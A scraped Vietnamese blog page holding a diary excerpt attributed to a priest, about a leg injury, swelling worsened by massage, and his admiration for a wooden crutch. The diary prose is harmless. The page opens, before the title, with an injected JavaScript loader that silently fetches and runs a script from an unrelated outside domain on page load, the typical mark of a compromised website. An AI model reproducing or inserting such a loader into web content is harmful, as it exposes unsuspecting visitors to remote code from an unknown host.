;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 019-XE TÔNG-CÁI NẠNG KỲ DIỆU (Tiếp) – Xitô PS

019-XE TÔNG-CÁI NẠNG KỲ DIỆU (Tiếp)

XE TÔNG-CÁI NẠNG KỲ DIỆU- (tiếp)

trích Nhật ký . Lm  Mai Thiện

 

Khi bị dập mô mềm, bài viết trên mạng nói cần phải để cho mô được yên, không vận dụng, động vào nó. Mình thì cứ cố gắng đi, y tá cũng không cản, còn đề nghị đi chút chút cho máu lưu thông! Bác sĩ thì bảo cần vuốt bắp thịt cho máu dễ về tim… Như thế đã làm cho chân cứ sưng… Sưng vù từ đầu gối xuống bàn chân, sưng cả bốn phía như quả bóng, nhấn vào có chỗ đau méo mặt!
Khi đã hơn 10 ngày, thấy tình trạng không khả quan, sẵn y tá V. nhiệt tình tự nguyện massage, mình ngõ ý anh làm, massage hai hiệp, sáng một hiệp và chiều thêm một hiệp. Anh xoa bóp (mình phải chịu đau vì mô , cơ bắp đang sưng viêm, có lúc đau méo cái mặt!), vuốt bắp thịt nhiều lần, thời gian mỗi hiệp cũng khoảng 20 phút… Kết quả là ngày hôm sau “giữ giường”theo nghĩa đen, không thể đặt chân trái xuống nền mà đi (dầu đi chấm phẩy). Anh mua cho cặp nạng, vậy là ngượng nghịu đến mấy cũng thực hành dùng nạng. Qua ba ngày dùng nạng, chân trái không bị áp lực của sức nặng đè lên nên bớt sưng nhiều, bây giờ thì có thể bỏ nạng được rồi, nhưng cũng phải dùng nạng thêm ít hôm để mô mềm chóng lành.
23.8.2018

Cám ơn người để phát minh ra cái nạng, nhờ nó mà người què có thể di chuyển được! Đang dùng một chiếc nạng gỗ đơn sơ mà hữu dụng. Mình có thì giờ rảnh ngắm nghía “công trình nạng gỗ” mà khâm phục tài khéo về kỹ thuật cũng như mỹ thuật của người thợ mộc.
Về kỹ thuật, đôi nạng dư sức đỡ cho người nặng hàng trăm ký. Đầu trên được lót mousse bọc vải, đầu dưới tiếp xúc với mặt đất là một núm cao xu, giúp cho nạng không khua tiếng lộc cộc rộn ràng khi bệnh nhân di chuyển. Núm cao xu này có đủ độ dày cũng như mặc tiếp đất được đúc táo dáng để chống trơn trượt. Nếu bệnh nhân què mà còn bị trượt nạng thì hậu quả có thể trầm trọng! Tay cầm của nạng thiết kế tròn, giữa có khắc rãnh để tăng độ bám của bàn tay. Tay cầm này bắt ốc vít, có thể xê xích ba vị trí để thích hợp cho cánh tay dài ngắn của các bệnh nhân. Nạng được liên kết bằng một số ốc vít và một ít đinh được che dấu khéo léo. Nói chung về kỹ thuật, không chê vào đâu được dầu nạng rất đơn sơ, việc thiết kế cái nạng của người thợ là làm “tới nơi tới chốn” !
Về khía cạnh mỹ thuật, nhìn cặp nạng hài hoà, không có gì chướng mắt. Cặp nạng “đẹp” vì trở nên “cái chân yêu quý” của tôi!

You May Also Like

Trả lời

X